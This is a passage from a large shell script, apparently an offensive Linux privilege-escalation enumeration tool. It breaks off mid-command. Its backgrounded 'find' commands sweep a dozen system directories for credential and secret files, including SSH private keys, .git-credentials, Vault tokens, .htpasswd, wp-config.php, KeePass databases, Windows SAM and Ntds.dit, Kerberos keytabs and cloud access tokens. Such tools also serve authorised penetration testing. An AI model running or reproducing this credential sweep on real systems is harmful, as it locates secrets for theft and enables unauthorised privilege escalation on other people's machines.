'\\\$NC 1>&2;"` + FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"bind\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"bind\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name 
\"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name 
\"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_BIN=`eval_bckgrd "find /bin -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name 
\"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o 
-name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_CACHE=`eval_bckgrd "find /.cache -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name 
\"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name 
\"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CDROM=`eval_bckgrd "find /cdrom -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name 
\"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o 
-name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_ETC=`eval_bckgrd "find /etc -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"*knockd*\" -o -name \".gitconfig\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name 
\"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name 